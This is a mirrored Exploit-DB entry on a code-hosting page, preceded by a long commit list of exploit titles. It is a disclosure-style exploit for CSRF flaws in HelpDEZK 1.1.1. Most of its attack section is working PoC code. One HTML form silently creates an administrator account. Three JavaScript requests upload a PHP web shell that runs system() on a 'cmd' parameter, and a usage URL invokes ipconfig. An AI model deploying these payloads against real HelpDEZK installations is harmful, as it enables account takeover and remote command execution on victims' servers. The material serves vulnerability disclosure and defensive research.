bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/41824.txt
Offensive Security 7018b7742d DB: 2017-04-07 
7 new exploits

Microsoft Windows - Explorer (.WMF) CreateBrushIndirect Denial of Service
Microsoft Windows Explorer - '.WMF' CreateBrushIndirect Denial of Service

Microsoft Windows - Explorer (.AVI) Unspecified Denial of Service
Microsoft Windows Explorer - '.AVI' Unspecified Denial of Service

Microsoft Windows - Explorer Unspecified .ANI File Denial of Service
Microsoft Windows Explorer - Unspecified '.ANI' File Denial of Service

Microsoft Windows - explorer.exe Gif Image Denial of Service
Microsoft Windows Explorer - '.GIF' Image Denial of Service

Microsoft Windows Media Player - AIFF Divide By Zero Exception Denial of Service (PoC)
Microsoft Windows Media Player - '.AIFF' Divide By Zero Exception Denial of Service (PoC)

Microsoft Windows - Explorer Unspecified .doc File Denial of Service
Microsoft Windows Explorer - Unspecified '.doc' File Denial of Service

Microsoft Windows - GDI+ '.ico' Remote Division By Zero Exploit
Microsoft Windows - GDI+ '.ICO' Remote Division By Zero Exploit

DesignWorks Professional 4.3.1 - Local .CCT File Stack Buffer Overflow (PoC)
DesignWorks Professional 4.3.1 - Local '.CCT' File Stack Buffer Overflow (PoC)

IrfanView 4.33 - Format PlugIn .TTF File Parsing Stack Based Overflow
IrfanView 4.33 - Format PlugIn '.TTF' File Parsing Stack Based Overflow

Microsoft Windows NT 4/2000 - TCP/IP Printing Service Denial of Service
Microsoft Windows NT 4.0/2000 - TCP/IP Printing Service Denial of Service

Microsoft Windows NT 4.0 / 2000 - LPC Zone Memory Depletion Denial of Service
Microsoft Windows NT 4.0/2000 - LPC Zone Memory Depletion Denial of Service

Microsoft Windows NT / 2000 - Terminal Server Service RDP Denial of Service
Microsoft Windows NT/2000 - Terminal Server Service RDP Denial of Service
Microsoft Windows NT 4/2000 - TCP Stack Denial of Service (1)
Microsoft Windows NT 4/2000 - TCP Stack Denial of Service (2)
Microsoft Windows NT 4.0/2000 - TCP Stack Denial of Service (1)
Microsoft Windows NT 4.0/2000 - TCP Stack Denial of Service (2)
Microsoft Windows XP/2000/NT 4 - Network Share Provider SMB Request Buffer Overflow (1)
Microsoft Windows XP/2000/NT 4 - Network Share Provider SMB Request Buffer Overflow (2)
Microsoft Windows XP/2000/NT 4.0 - Network Share Provider SMB Request Buffer Overflow (1)
Microsoft Windows XP/2000/NT 4.0 - Network Share Provider SMB Request Buffer Overflow (2)
Microsoft Windows XP/2000/NT 4 - RPC Service Denial of Service (1)
Microsoft Windows XP/2000/NT 4 - RPC Service Denial of Service (2)
Microsoft Windows XP/2000/NT 4 - RPC Service Denial of Service (3)
Microsoft Windows XP/2000/NT 4 - RPC Service Denial of Service (4)
Microsoft Windows XP/2000/NT 4.0 - RPC Service Denial of Service (1)
Microsoft Windows XP/2000/NT 4.0 - RPC Service Denial of Service (2)
Microsoft Windows XP/2000/NT 4.0 - RPC Service Denial of Service (3)
Microsoft Windows XP/2000/NT 4.0 - RPC Service Denial of Service (4)

Microsoft Windows XP/95/98/2000/NT 4 - 'Riched20.dll' Attribute Buffer Overflow
Microsoft Windows XP/95/98/2000/NT 4.0 - 'Riched20.dll' Attribute Buffer Overflow

Microsoft Windows XP/2000/NT 4 - Shell Long Share Name Buffer Overrun
Microsoft Windows XP/2000/NT 4.0 - Shell Long Share Name Buffer Overrun

Microsoft Windows Explorer - 'explorer.exe' .WMV File Handling Denial of Service
Microsoft Windows Explorer - 'explorer.exe' '.WMV' File Handling Denial of Service
Apple Mac OSX 10.4.x - iMovie HD .imovieproj Filename Format String
Apple Mac OSX 10.4.x - Help Viewer .help Filename Format String
Apple Mac OSX 10.4.x - iMovie HD '.imovieproj' Filename Format String
Apple Mac OSX 10.4.x - Help Viewer '.help' Filename Format String

Microsoft Windows XP/2003 - Explorer .WMF File Handling Denial of Service
Microsoft Windows XP/2003 - Explorer '.WMF' File Handling Denial of Service

Microsoft Windows Cursor - Object Potential Memory Leak (MS15-115)
Microsoft Windows - Cursor Object Potential Memory Leak (MS15-115)

Microsoft Windows Kernel win32k!OffsetChildren - Null Pointer Dereference
Microsoft Windows Kernel - win32k!OffsetChildren Null Pointer Dereference

Palo Alto Networks PanOS appweb3 - Stack Buffer Overflow
Palo Alto Networks PanOS - appweb3 Stack Buffer Overflow

Cesanta Mongoose OS - Use-After-Free

CommVault Edge 11 SP6 - Stack Buffer Overflow (PoC)

GLIBC (via /bin/su) - Privilege Escalation
GLIBC - '/bin/su' Privilege Escalation

cPanel 10.8.x - (cpwrap via mysqladmin) Privilege Escalation
cPanel 10.8.x - (cpwrap via MySQLAdmin) Privilege Escalation

Microsoft Windows - NtRaiseHardError Csrss.exe Memory Disclosure
Microsoft Windows - NtRaiseHardError 'Csrss.exe' Memory Disclosure

Microsoft Windows Contacts - 'wab32res.dll' DLL Hijacking
Microsoft Windows - Contacts 'wab32res.dll' DLL Hijacking

Microsoft Visio - 'VISIODWG.dll' .DXF File Handling (MS10-028) (Metasploit)
Microsoft Visio - 'VISIODWG.dll' '.DXF' File Handling (MS10-028) (Metasploit)

Microsoft Windows - Task Scheduler .XML Privilege Escalation (MS10-092) (Metasploit)
Microsoft Windows - Task Scheduler '.XML' Privilege Escalation (MS10-092) (Metasploit)

Microsoft Windows NT 4/2000 - DLL Search Path
Microsoft Windows NT 4.0/2000 - DLL Search Path

Microsoft Windows NT 4.0 / 2000 Predictable LPC Message Identifier - Multiple Vulnerabilities
Microsoft Windows NT 4.0/2000 Predictable LPC Message Identifier - Multiple Vulnerabilities

Microsoft Windows NT 4.0 / 2000 - Spoofed LPC Request (MS00-003)
Microsoft Windows NT 4.0/2000 - Spoofed LPC Request (MS00-003)

Microsoft Windows NT 3/4 - CSRSS Memory Access Violation
Microsoft Windows NT 3/4.0 - CSRSS Memory Access Violation

Microsoft Windows NT 4/2000 - NTFS File Hiding
Microsoft Windows NT 4.0/2000 - NTFS File Hiding

Microsoft Windows NT 4/2000 - Process Handle Local Privilege Elevation
Microsoft Windows NT 4.0/2000 - Process Handle Local Privilege Elevation
Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (1)
Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (2)
Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (3)
Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (4)
Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (5)
Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (6)
Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (7)
Microsoft Windows XP/2000/NT 4 - Window Message Subsystem Design Error (8)
Microsoft Windows XP/2000/NT 4.0 - Window Message Subsystem Design Error (1)
Microsoft Windows XP/2000/NT 4.0 - Window Message Subsystem Design Error (2)
Microsoft Windows XP/2000/NT 4.0 - Window Message Subsystem Design Error (3)
Microsoft Windows XP/2000/NT 4.0 - Window Message Subsystem Design Error (4)
Microsoft Windows XP/2000/NT 4.0 - Window Message Subsystem Design Error (5)
Microsoft Windows XP/2000/NT 4.0 - Window Message Subsystem Design Error (6)
Microsoft Windows XP/2000/NT 4.0 - Window Message Subsystem Design Error (7)
Microsoft Windows XP/2000/NT 4.0 - Window Message Subsystem Design Error (8)
Microsoft Windows XP/2000/NT 4 - NetDDE Privilege Escalation (1)
Microsoft Windows XP/2000/NT 4 - NetDDE Privilege Escalation (2)
Microsoft Windows XP/2000/NT 4.0 - NetDDE Privilege Escalation (1)
Microsoft Windows XP/2000/NT 4.0 - NetDDE Privilege Escalation (2)

Microsoft Windows Server 2000 - Help Facility .CNT File :Link Buffer Overflow
Microsoft Windows Server 2000 - Help Facility '.CNT' File :Link Buffer Overflow

Microsoft Windows NT 4/2000 - Local Descriptor Table Privilege Escalation (MS04-011)
Microsoft Windows NT 4.0/2000 - Local Descriptor Table Privilege Escalation (MS04-011)

Microsoft Windows NT 4/2000 - POSIX Subsystem Buffer Overflow Privilege Escalation (MS04-020)
Microsoft Windows NT 4.0/2000 - POSIX Subsystem Buffer Overflow Privilege Escalation (MS04-020)

Microsoft Windows 10 Build 10130 - User Mode Font Driver Thread Permissions Privilege Escalation
Microsoft Windows 10 (Build 10130) - User Mode Font Driver Thread Permissions Privilege Escalation

Palo Alto Networks PanOS root_reboot - Privilege Escalation
Palo Alto Networks PanOS - root_reboot Privilege Escalation

Oracle 9i / 10g - File System Access via utl_file Exploit
Oracle 9i / 10g - 'utl_file' File System Access Exploit

KDE 4.4.1 - Ksysguard Remote Code Execution via Cross Application Scripting
KDE 4.4.1 - Ksysguard Remote Code Execution (via Cross Application Scripting)

QuickPHP Web Server Arbitrary - 'src .php' File Download
QuickPHP Web Server - Arbitrary '.php' File Download

Microsoft Windows Common Control Library (Comctl32) - Heap Overflow (MS10-081)
Microsoft Windows - Common Control Library (Comctl32) Heap Overflow (MS10-081)

Microsoft Internet Explorer 4 (Windows 95/NT 4) - Setupctl ActiveX Control Buffer Overflow
Microsoft Internet Explorer 4 (Windows 95/NT 4.0) - Setupctl ActiveX Control Buffer Overflow

Microsoft Internet Explorer 5 (Windows 95/98/2000/NT 4) - XML HTTP Redirect
Microsoft Internet Explorer 5 (Windows 95/98/2000/NT 4.0) - XML HTTP Redirect

Microsoft Windows NT 4/2000 - NetBIOS Name Conflict
Microsoft Windows NT 4.0/2000 - NetBIOS Name Conflict

X-Chat 1.2/1.3/1.4/1.5 - Command Execution Via URLs
X-Chat 1.2/1.3/1.4/1.5 - Command Execution via URLs

Microsoft Windows 95/98/2000/NT4 - WinHlp Item Buffer Overflow
Microsoft Windows 95/98/2000/NT 4.0 - WinHlp Item Buffer Overflow

Microsoft Windows XP/2000/NT 4 - Help Facility ActiveX Control Buffer Overflow
Microsoft Windows XP/2000/NT 4.0 - Help Facility ActiveX Control Buffer Overflow

Microsoft Windows XP/2000/NT 4 - Locator Service Buffer Overflow
Microsoft Windows XP/2000/NT 4.0 - Locator Service Buffer Overflow

AIX 3.x/4.x / Windows 95/98/2000/NT 4 / SunOS 5 gethostbyname() - Buffer Overflow
AIX 3.x/4.x / Windows 95/98/2000/NT 4.0 / SunOS 5 gethostbyname() - Buffer Overflow
Microsoft IIS 5.0 (Windows XP/2000/NT 4) - WebDAV 'ntdll.dll' Buffer Overflow (1)
Microsoft IIS 5.0 (Windows XP/2000/NT 4) - WebDAV 'ntdll.dll' Buffer Overflow (2)
Microsoft IIS 5.0 (Windows XP/2000/NT 4) - WebDAV 'ntdll.dll' Buffer Overflow (3)
Microsoft IIS 5.0 (Windows XP/2000/NT 4) - WebDAV 'ntdll.dll' Buffer Overflow (4)
Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Buffer Overflow (1)
Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Buffer Overflow (2)
Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Buffer Overflow (3)
Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Buffer Overflow (4)

Microsoft Windows XP/2000/NT 4 - HTML Converter HR Align Buffer Overflow
Microsoft Windows XP/2000/NT 4.0 - HTML Converter HR Align Buffer Overflow

Microsoft Windows NT 4/2000 - Media Services 'nsiislog.dll' Remote Buffer Overflow
Microsoft Windows NT 4.0/2000 - Media Services 'nsiislog.dll' Remote Buffer Overflow

Cerulean Studios Trillian 3.0 - Remote .png Image File Parsing Buffer Overflow
Cerulean Studios Trillian 3.0 - Remote '.png' Image File Parsing Buffer Overflow

Zoom Player 3.30/5/6 - Crafted .ZPL File Error Message Arbitrary Code Execution
Zoom Player 3.30/5/6 - Crafted '.ZPL' File Error Message Arbitrary Code Execution

SpiceWorks 7.5 TFTP - Remote File Overwrite / Upload

Windows 10 x64 - Egghunter Shellcode (45 bytes)

eFiction 2.0 - 'Fake .gif' Arbitrary File Upload
eFiction 2.0 - Fake '.GIF' Arbitrary File Upload

cPanel 10.8.x - (cpwrap via mysqladmin) Privilege Escalation (PHP)
cPanel 10.8.x - (cpwrap via MySQLAdmin) Privilege Escalation (PHP)
Apple WebKit 10.0.2(12602.3.12.0.1) - 'disconnectSubframes' Universal Cross-Site Scripting
Apple WebKit 10.0.2(12602.3.12.0.1_ r210800) - 'constructJSReadableStreamDefaultReader' Type Confusion
Apple WebKit 10.0.2 (12602.3.12.0.1) - 'disconnectSubframes' Universal Cross-Site Scripting
Apple WebKit 10.0.2 (12602.3.12.0.1_ r210800) - 'constructJSReadableStreamDefaultReader' Type Confusion

SharePoint 2007/2010 and DotNetNuke < 6 - File Disclosure via XEE
SharePoint 2007/2010 and DotNetNuke < 6 - File Disclosure (via XEE)

The Uploader 2.0.4 - (English/Italian) Arbitrary File Upload / Remote Code Execution (Metasploit)
The Uploader 2.0.4 (English/Italian) - Arbitrary File Upload / Remote Code Execution (Metasploit)

elFinder 2 - Remote Command Execution (Via File Creation)
elFinder 2 - Remote Command Execution (via File Creation)

Magento < 2.0.6 - Unauthenticated Arbitrary Unserialize -> Arbitrary Write File
Magento < 2.0.6 - Unauthenticated Arbitrary Unserialize / Arbitrary Write File

AXIS Multiple Products - Authenticated Remote Command Execution via devtools Vector
AXIS Multiple Products - 'devtools ' Authenticated Remote Command Execution
GeoMoose < 2.9.2 - Directory Traversal
Moodle 2.x/3.x - SQL Injection
HelpDEZK 1.1.1 - Cross-Site Request Forgery / Code Execution
2017-04-07 05:01:20 +00:00

213 lines
11 KiB
Text
Executable file
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Exploit Title: Multiple CSRF Remote Code Execution Vulnerability on HelpDEZK 1.1.1
# Date: 05-April-2017
# Exploit Author: @rungga_reksya, @yokoacc, @AdyWikradinata, @dickysofficial, @dvnrcy
# Vendor Homepage: http://www.helpdezk.org/
# Software Link: https://codeload.github.com/albandes/helpdezk/zip/v1.1.1
# Version: 1.1.1
# Tested on: Windows Server 2012 Datacenter Evaluation
# CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N (9.1 - CRITICAL)# CVE: CVE-2017-7446 and CVE-2017-7447
I. Background:
HelpDEZk is a powerfull software that manages requests/incidents. It has all the needed requirements to an efficient workflow management of all processes involved in service execution. This control is done for internal demands and also for outsourced services. HelpDEZk can be used at any company's area, serving as an support to the shared service center concept, beyond the ability to log all the processes and maintain the request's history, it can pass it through many approval levels. HelpDEZk can put together advanced managing resources with an extremely easy use. Simple and intuitive screens make the day-by-day easier for your team, speeding up the procedures and saving up a lot of time. It is developped in objects oriented PHP language, with the MVC architecture and uses the templates system SMARTY. For the javascripts, JQUERY is used.
II. Description:
Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application.
HelpDEZK have role for type person:
admin = 1
user = 2
operator = 3
costumer = 4
partner = 5
group = 6
III. Exploit:
—> The first CSRF Target is: “/admin/home#/person/”
(Admin - Records - People & Companies)
The guest (no have account) can make admin privilege with CSRF Remote Code Execution. This is script for make account admin:
<html>
  <!-- CSRF PoC on insert menu people -->
  <body>
    <form action="http://192.168.228.186/helpdezk-1.1.1/admin/person/insertNatural" method="POST">
      <input type="hidden" name="login" value="testing" />
      <input type="hidden" name="logintype" value=“3” />  <!-- Type Login = 3 (HD) -->
      <input type="hidden" name="password" value="testing" />
      <input type="hidden" name="name" value="testing" />
      <input type="hidden" name="email" value="testing&#64;local&#46;com" /> <!-- e.g: testing@local.com -->
      <input type="hidden" name="company" value="60" />
      <input type="hidden" name="department" value="1" />
      <input type="hidden" name="phone" value="" />
      <input type="hidden" name="branch" value="" />
      <input type="hidden" name="mobile" value="" />
      <input type="hidden" name="country" value="1" />
      <input type="hidden" name="state" value="1" />
      <input type="hidden" name="cpf" value="" />
      <input type="hidden" name="city" value="1" />
      <input type="hidden" name="neighborhood" value="Choose" />
      <input type="hidden" name="zipcode" value="" />
      <input type="hidden" name="typestreet" value="1" />
      <input type="hidden" name="address" value="Choose" />
      <input type="hidden" name="number" value="" />
      <input type="hidden" name="complement" value="" />
      <input type="hidden" name="typeuser" value="1" /> <!-- admin privilege -->
      <input type="hidden" name="location" value="" />
      <input type="hidden" name="vip" value="N" />
      <input type="hidden" name="filladdress" value="N" />
      <input type="hidden" name="dtbirth" value="" />
      <input type="hidden" name="gender" value="M" />
      <input type="hidden" name="time&#95;value" value="" />
      <input type="hidden" name="overtime" value="" />
      <input type="hidden" name="changePassInsert" value="0" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
—> The second CSRF target is: /admin/home#/logos/
(Admin - Config - Logos)
If we have minimum low privilege, we can remote code execute to make shell on module logos (Position of Page Header, Login Page and Reports Logo). The HelpDEZK unrestricted file extension but normally access only for admin.
If you have low privilege, please choose which one to execute this code (before execute, you shall login into application):
<!-- CSRF PoC - Login Page Logo -->
<html>
  <body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://192.168.228.186/helpdezk-1.1.1/admin/logos/upload2", true);
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------1883328331133778598415248998");
        xhr.withCredentials = true;
        var body = "-----------------------------1883328331133778598415248998\r\n" +
          "Content-Disposition: form-data; name=\"file\"; filename=\"index.php\"\r\n" +
          "Content-Type: text/php\r\n" +
          "\r\n" +
          "\x3c?php\n" +
          "\n" +
          "if(isset($_REQUEST[\'cmd\'])){\n" +
          "        echo \"\x3cpre\x3e\";\n" +
          "        $cmd = ($_REQUEST[\'cmd\']);\n" +
          "        system($cmd);\n" +
          "        echo \"\x3c/pre\x3e\";\n" +
          "        die;\n" +
          "}\n" +
          "\n" +
          "?\x3e\r\n" +
          "-----------------------------1883328331133778598415248998--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i);
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>
————
 <!-- CSRF PoC Page Header Logo -->
<html>
  <body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://192.168.228.186/helpdezk-1.1.1/admin/logos/upload", true);
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------11525671838941487412014811928");
        xhr.withCredentials = true;
        var body = "-----------------------------11525671838941487412014811928\r\n" +
          "Content-Disposition: form-data; name=\"file\"; filename=\"shell.php\"\r\n" +
          "Content-Type: text/php\r\n" +
          "\r\n" +
          "\x3c?php\n" +
          "\n" +
          "if(isset($_REQUEST[\'cmd\'])){\n" +
          "        echo \"\x3cpre\x3e\";\n" +
          "        $cmd = ($_REQUEST[\'cmd\']);\n" +
          "        system($cmd);\n" +
          "        echo \"\x3c/pre\x3e\";\n" +
          "        die;\n" +
          "}\n" +
          "\n" +
          "?\x3e\r\n" +
          "-----------------------------11525671838941487412014811928--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i);
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>
———————
  <!-- CSRF PoC - Reports Logo -->
<html>
  <body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://192.168.228.186/helpdezk-1.1.1/admin/logos/upload3", true);
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------1789373681642463979344317937");
        xhr.withCredentials = true;
        var body = "-----------------------------1789373681642463979344317937\r\n" +
          "Content-Disposition: form-data; name=\"file\"; filename=\"index.php\"\r\n" +
          "Content-Type: text/php\r\n" +
          "\r\n" +
          "\x3c?php\n" +
          "\n" +
          "if(isset($_REQUEST[\'cmd\'])){\n" +
          "        echo \"\x3cpre\x3e\";\n" +
          "        $cmd = ($_REQUEST[\'cmd\']);\n" +
          "        system($cmd);\n" +
          "        echo \"\x3c/pre\x3e\";\n" +
          "        die;\n" +
          "}\n" +
          "\n" +
          "?\x3e\r\n" +
          "-----------------------------1789373681642463979344317937--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i);
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>
————
If you have executed and success, check your file on:
http://example.com/helpdezk-1.1.1/app/uploads/logos/
and PWN ^_^
http://example.com/helpdezk-1.1.1/app/uploads/logos/login_index.php?cmd=ipconfig
IV. Thanks to:
- Alloh SWT
- MyBoboboy
- Komunitas IT Auditor & IT Security
Refer:
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
https://www.owasp.org/index.php/Testing_for_Privilege_escalation_(OTG-AUTHZ-003)http://rungga.blogspot.co.id/2017/04/multiple-csrf-remote-code-execution.html
https://github.com/albandes/helpdezk/issues/2
Reference in a new issue View git blame Copy permalink